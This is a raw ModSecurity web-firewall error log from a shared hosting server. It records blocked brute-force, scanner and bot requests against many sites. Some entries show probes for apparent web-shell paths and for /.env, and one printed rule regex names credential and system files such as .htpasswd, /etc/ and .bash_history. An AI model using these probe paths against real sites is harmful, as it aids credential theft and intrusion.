[Tue May 26 16:43:39.142650 2026] [security2:error] [pid 817651:tid 817889] [client 93.116.1.220:53375] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.1.116.93.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/xmlrpc.php"] [unique_id "ahWAYtlGRCPPN1dS2y2vLwAAAPE"]
[Tue May 26 16:43:39.142873 2026] [security2:error] [pid 817651:tid 817889] [client 93.116.1.220:53375] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "christinaspromotions.com"] [uri "/xmlrpc.php"] [unique_id "ahWAYtlGRCPPN1dS2y2vLwAAAPE"]
[Tue May 26 16:43:39.331288 2026] [security2:error] [pid 817651:tid 817751] [remote 216.73.216.30:2744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWAY9lGRCPPN1dS2y2vMgAA32M"]
[Tue May 26 16:43:40.842141 2026] [security2:error] [pid 817651:tid 817832] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAZNlGRCPPN1dS2y2vOwAAALg"]
[Tue May 26 16:43:42.236140 2026] [security2:error] [pid 817651:tid 817895] [client 89.221.206.249:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAZtlGRCPPN1dS2y2vTAAAAPc"], referer: https://www.anujtradingco.com/
[Tue May 26 16:43:42.901819 2026] [security2:error] [pid 823496:tid 823698] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAZpa08mrtyBNpA4PLigAAAEY"]
[Tue May 26 16:43:43.165808 2026] [security2:error] [pid 823496:tid 823744] [client 89.221.206.249:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAZ5a08mrtyBNpA4PLlQAAAHQ"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1431741&moderation-hash=49c10c23b02da98e066105372b2c9381
[Tue May 26 16:43:44.114406 2026] [security2:error] [pid 817651:tid 817654] [remote 216.73.216.30:2744] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWAaNlGRCPPN1dS2y2vXAAAkAI"]
[Tue May 26 16:43:44.956197 2026] [security2:error] [pid 817651:tid 817839] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAaNlGRCPPN1dS2y2vXgAAAL8"]
[Tue May 26 16:43:46.481080 2026] [security2:error] [pid 823496:tid 823736] [client 114.119.131.206:59725] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahWAapa08mrtyBNpA4PL0AAAAGw"], referer: http://haddingtonwines.com/cart?remove_item=37bf8bb245c5ae952fb107153f18958f
[Tue May 26 16:43:46.490844 2026] [security2:error] [pid 817651:tid 817861] [client 66.249.64.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWAatlGRCPPN1dS2y2vbQAAANU"]
[Tue May 26 16:43:46.491262 2026] [security2:error] [pid 817651:tid 817797] [client 66.249.64.109:46910] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWAatlGRCPPN1dS2y2vbAAAAJU"]
[Tue May 26 16:43:46.697883 2026] [security2:error] [pid 823496:tid 823734] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAaZa08mrtyBNpA4PLwQAAAGo"]
[Tue May 26 16:43:47.107591 2026] [security2:error] [pid 823496:tid 823676] [client 117.198.37.168:57837] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAa5a08mrtyBNpA4PL5QAAADA"]
[Tue May 26 16:43:47.107688 2026] [security2:error] [pid 823496:tid 823676] [client 117.198.37.168:57837] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAa5a08mrtyBNpA4PL5QAAADA"]
[Tue May 26 16:43:47.926373 2026] [security2:error] [pid 823496:tid 823639] [client 89.221.206.249:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWAa5a08mrtyBNpA4PL9wAAAAs"], referer: https://anujtradingco.com
[Tue May 26 16:43:47.950800 2026] [security2:error] [pid 817651:tid 817782] [client 185.191.171.17:28292] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/august-11-15/list/"] [unique_id "ahWAa9lGRCPPN1dS2y2vhQAAAIY"]
[Tue May 26 16:43:47.950941 2026] [security2:error] [pid 817651:tid 817782] [client 185.191.171.17:28292] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/august-11-15/list/"] [unique_id "ahWAa9lGRCPPN1dS2y2vhQAAAIY"]
[Tue May 26 16:43:48.860370 2026] [security2:error] [pid 817651:tid 817890] [client 20.151.111.128:3390] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "virgence.com"] [uri "/wp-plain.php"] [unique_id "ahWAbNlGRCPPN1dS2y2vkAAAAPI"], referer: www.google.com
[Tue May 26 16:43:48.870145 2026] [security2:error] [pid 817651:tid 817805] [client 20.151.111.128:3374] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "virgence.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWAbNlGRCPPN1dS2y2vjwAAAJ0"], referer: www.google.com
[Tue May 26 16:43:49.061269 2026] [security2:error] [pid 823496:tid 823659] [client 14.228.178.99:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAbJa08mrtyBNpA4PL_QAAAB8"]
[Tue May 26 16:43:49.276291 2026] [security2:error] [pid 823496:tid 823741] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAbJa08mrtyBNpA4PL_wAAAHE"]
[Tue May 26 16:43:49.369735 2026] [security2:error] [pid 817651:tid 817652] [remote 216.73.216.30:53892] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/crm"] [unique_id "ahWAbdlGRCPPN1dS2y2vmwAAxgA"]
[Tue May 26 16:43:49.719923 2026] [security2:error] [pid 817651:tid 817818] [client 20.151.111.128:3367] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "virgence.com"] [uri "/index.php"] [unique_id "ahWAbNlGRCPPN1dS2y2vjQAAAKo"], referer: www.google.com
[Tue May 26 16:43:49.853604 2026] [security2:error] [pid 817651:tid 817852] [client 20.151.111.128:3351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "virgence.com"] [uri "/sjrhwlix.php"] [unique_id "ahWAbdlGRCPPN1dS2y2vnwAAAMw"], referer: www.google.com
[Tue May 26 16:43:50.024091 2026] [security2:error] [pid 817651:tid 817885] [client 20.151.111.128:3367] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "virgence.com"] [uri "/index.php"] [unique_id "ahWAbdlGRCPPN1dS2y2voQAAAO0"], referer: www.google.com
[Tue May 26 16:43:50.489484 2026] [security2:error] [pid 823496:tid 823662] [client 176.65.139.238:51474] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "api.lagoslawntennisclub1895.com"] [uri "/.env"] [unique_id "ahWAbpa08mrtyBNpA4PMFwAAACI"]
[Tue May 26 16:43:51.509677 2026] [security2:error] [pid 823496:tid 823654] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAbZa08mrtyBNpA4PMDwAAABo"]
[Tue May 26 16:43:52.888131 2026] [security2:error] [pid 823496:tid 823742] [client 20.151.111.128:3329] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "virgence.com"] [uri "/wp-plain.php"] [unique_id "ahWAcJa08mrtyBNpA4PMSgAAAHI"], referer: www.google.com
[Tue May 26 16:43:52.937070 2026] [security2:error] [pid 823496:tid 823699] [client 20.151.111.128:3373] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "virgence.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWAcJa08mrtyBNpA4PMSwAAAEc"], referer: www.google.com
[Tue May 26 16:43:53.382244 2026] [security2:error] [pid 823496:tid 823704] [client 20.151.111.128:8279] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "virgence.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWAcZa08mrtyBNpA4PMVQAAAEw"]
[Tue May 26 16:43:53.544069 2026] [core:crit] [pid 823496:tid 823696] (13)Permission denied: [client 207.46.13.126:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:43:53.860030 2026] [security2:error] [pid 823496:tid 823755] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAcJa08mrtyBNpA4PMRAAAAH8"]
[Tue May 26 16:43:54.117604 2026] [security2:error] [pid 817651:tid 817730] [remote 216.73.216.30:53892] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWActlGRCPPN1dS2y2v2gAA5U4"]
[Tue May 26 16:43:55.148860 2026] [security2:error] [pid 817651:tid 817748] [remote 52.167.144.220:63882] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.144.167.52.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "virgence.com"] [uri "/index.php/about-the-studio/"] [unique_id "ahWAc9lGRCPPN1dS2y2v9gAArWA"]
[Tue May 26 16:43:55.152263 2026] [security2:error] [pid 817651:tid 817830] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWActlGRCPPN1dS2y2v2QAAALY"]
[Tue May 26 16:43:55.841017 2026] [security2:error] [pid 823496:tid 823663] [client 20.151.111.128:3342] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "virgence.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWAc5a08mrtyBNpA4PMbAAAACM"]
[Tue May 26 16:43:55.865021 2026] [security2:error] [pid 823496:tid 823635] [client 20.151.111.128:8261] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "virgence.com"] [uri "/nzgtaraz.php"] [unique_id "ahWAc5a08mrtyBNpA4PMbgAAAAc"], referer: www.google.com
[Tue May 26 16:43:57.447455 2026] [security2:error] [pid 817651:tid 817883] [client 117.198.37.168:58159] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAddlGRCPPN1dS2y2wKAAAAOs"]
[Tue May 26 16:43:57.447574 2026] [security2:error] [pid 817651:tid 817883] [client 117.198.37.168:58159] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWAddlGRCPPN1dS2y2wKAAAAOs"]
[Tue May 26 16:43:57.558173 2026] [core:crit] [pid 817651:tid 817880] (13)Permission denied: [client 52.167.144.18:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:43:57.646496 2026] [security2:error] [pid 817651:tid 817906] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAdNlGRCPPN1dS2y2wIgAAAQI"]
[Tue May 26 16:43:59.157054 2026] [security2:error] [pid 823496:tid 823743] [client 20.151.111.128:3390] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "virgence.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahWAd5a08mrtyBNpA4PMmgAAAHM"]
[Tue May 26 16:43:59.217847 2026] [security2:error] [pid 823496:tid 823657] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAdpa08mrtyBNpA4PMhwAAAB0"]
[Tue May 26 16:43:59.395161 2026] [security2:error] [pid 823496:tid 823658] [client 185.185.217.76:46432] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.217.185.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "karuppuswamykovil.in"] [uri "/index.php"] [unique_id "ahWAd5a08mrtyBNpA4PMnAAAAB4"]
[Tue May 26 16:43:59.529664 2026] [security2:error] [pid 823496:tid 823573] [remote 216.73.216.30:54112] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWAd5a08mrtyBNpA4PMowAAQko"]
[Tue May 26 16:43:59.980781 2026] [security2:error] [pid 823496:tid 823678] [client 185.185.217.76:46761] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.217.185.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "karuppuswamykovil.in"] [uri "/temple-significance.php"] [unique_id "ahWAd5a08mrtyBNpA4PMqwAAADI"]
[Tue May 26 16:44:00.558851 2026] [security2:error] [pid 823496:tid 823712] [client 185.185.217.76:47111] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.217.185.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "karuppuswamykovil.in"] [uri "/temple-pk.php"] [unique_id "ahWAeJa08mrtyBNpA4PMuQAAAFQ"]
[Tue May 26 16:44:01.142870 2026] [security2:error] [pid 823496:tid 823688] [client 185.185.217.76:47373] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.217.185.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "karuppuswamykovil.in"] [uri "/temple-festivals.php"] [unique_id "ahWAeZa08mrtyBNpA4PMvgAAADw"]
[Tue May 26 16:44:01.190030 2026] [security2:error] [pid 817651:tid 817686] [remote 74.7.241.58:33088] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWAedlGRCPPN1dS2y2wTAAAnyI"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes/IXR
[Tue May 26 16:44:01.415669 2026] [security2:error] [pid 817651:tid 817875] [client 37.59.204.132:63396] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "freedomwealthchoose.com"] [uri "/robots.txt"] [unique_id "ahWAedlGRCPPN1dS2y2wTQAAAOM"]
[Tue May 26 16:44:01.415798 2026] [security2:error] [pid 817651:tid 817875] [client 37.59.204.132:63396] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "freedomwealthchoose.com"] [uri "/robots.txt"] [unique_id "ahWAedlGRCPPN1dS2y2wTQAAAOM"]
[Tue May 26 16:44:01.728257 2026] [security2:error] [pid 817651:tid 817898] [client 185.185.217.76:47695] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.217.185.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "karuppuswamykovil.in"] [uri "/temple-prayers.php"] [unique_id "ahWAedlGRCPPN1dS2y2wUgAAAPo"]
[Tue May 26 16:44:01.894073 2026] [security2:error] [pid 817651:tid 817823] [client 20.151.111.128:8275] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "virgence.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahWAedlGRCPPN1dS2y2wVAAAAK8"]
[Tue May 26 16:44:01.977774 2026] [security2:error] [pid 823496:tid 823748] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAeJa08mrtyBNpA4PMuAAAAHg"]
[Tue May 26 16:44:02.339110 2026] [security2:error] [pid 823496:tid 823714] [client 185.185.217.76:48069] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.217.185.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "karuppuswamykovil.in"] [uri "/temple-media.php"] [unique_id "ahWAepa08mrtyBNpA4PMxgAAAFY"]
[Tue May 26 16:44:02.887990 2026] [security2:error] [pid 823496:tid 823719] [client 54.39.136.3:35486] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "freedomwealthchoose.com"] [uri "/"] [unique_id "ahWAepa08mrtyBNpA4PMyQAAAFs"]
[Tue May 26 16:44:02.888111 2026] [security2:error] [pid 823496:tid 823719] [client 54.39.136.3:35486] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "freedomwealthchoose.com"] [uri "/"] [unique_id "ahWAepa08mrtyBNpA4PMyQAAAFs"]
[Tue May 26 16:44:03.080586 2026] [security2:error] [pid 823496:tid 823724] [client 185.185.217.76:48584] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.217.185.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "karuppuswamykovil.in"] [uri "/temple-howtoreach.php"] [unique_id "ahWAe5a08mrtyBNpA4PMzQAAAGA"]
[Tue May 26 16:44:03.658916 2026] [security2:error] [pid 823496:tid 823660] [client 185.185.217.76:49008] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.217.185.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "karuppuswamykovil.in"] [uri "/temple-ok.php"] [unique_id "ahWAe5a08mrtyBNpA4PM1QAAACA"]
[Tue May 26 16:44:03.741067 2026] [security2:error] [pid 817651:tid 817859] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWAetlGRCPPN1dS2y2wXQAAANM"]
